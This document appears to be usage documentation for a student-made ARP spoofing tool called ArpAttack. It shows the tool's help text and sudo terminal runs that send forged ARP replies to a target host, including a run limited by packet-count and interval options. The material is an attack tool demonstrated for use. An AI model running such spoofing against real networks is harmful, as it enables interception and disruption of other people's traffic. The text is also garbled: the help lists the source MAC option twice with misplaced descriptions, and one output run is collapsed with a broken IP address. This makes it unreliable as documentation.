Without options:

```
Error: interface must be specified (--interface/-i <if>)
Error: destination MAC must be specified (--dest_mac/-D <mac>)
Error: source MAC must be specified (--source_mac/-S <mac>)
Error: source IPv4 must be specified (--source_ip/-s <ip>)
                                ArpAttack - ARP spoofing tool
[USAGE] arpattack -i <if> -d <ip> -D <mac> -s <ip> -S <mac>
[OPTIONS]
           --interface (-i)
                                                      Name of the network interface
           --dest_ip (-d)
--dest_mac (-D)
                                           IPv4 of the destination host
                                           MAC of the destination host
           --source_mac (-s)
--source_mac (-s)
                                                      IPv4 of the source host
MAC of the source host
           --n_packets (-n)
                                                      Number of ARP packets to send. Default is infinite
          --time_step (-t)
--help (-h)
                                                      Seconds to wait between packet sent. Default is 2 secs
                                                      Prints this help
```

With required options

```
ubuntu_user@DESKTOP-SQEIAPA:/mnt/c/Users/HP/Desktop/CN/Raw_Sockets/arp_spoofing_series/4$ sudo ./arp -i eth0 -d 11.22.33.44 -D aa:bb:cc:dd:ee:ff -s 99.88.77 .66 -S aa:bb:cc:dd:ee:ff -s 99.88.77 .66 is at aa:bb:cc:dd:ee:ff Sending to 11.22.33.44 [aa:bb:cc:dd:ee:ff]: 99.88.77 .66 is at aa:bb:cc:dd:ee:ff Sending to 11.22.33.44 [aa:bb:cc:dd:ee:ff]: 99.88.77 .66 is at aa:bb:cc:dd:ee:ff Sending to 11.22.33.44 [aa:bb:cc:dd:ee:ff]: 99.88.77 .66 is at aa:bb:cc:dd:ee:ff Sending to 11.22.33.44 [aa:bb:cc:dd:ee:ff]: 99.88.77 .66 is at aa:bb:cc:dd:ee:ff
```

With extra options

- -n number of packets (2)
- -t time step (5)

```
*Cubuntu_user@DESKTOP-SQEIAPA:/mnt/c/Users/HP/Desktop/CN/Raw_Sockets/arp_spoofing_series/4$ sudo ./arp -i eth0 -d 11.22.33.44 -D aa:bb:cc:dd:ee:ff -s 99.88.77.66 -S aa:bb:cc:dd:ee:ff -n 2 -t 5
Sending to 11.22.33.44 [aa:bb:cc:dd:ee:ff]: 99.88.77.66 is at aa:bb:cc:dd:ee:ff
Sending to 11.22.33.44 [aa:bb:cc:dd:ee:ff]: 99.88.77.66 is at aa:bb:cc:dd:ee:ff
ubuntu_user@DESKTOP-SQEIAPA:/mnt/c/Users/HP/Desktop/CN/Raw_Sockets/arp_spoofing_series/4$ |
```

Process exits after sending two packets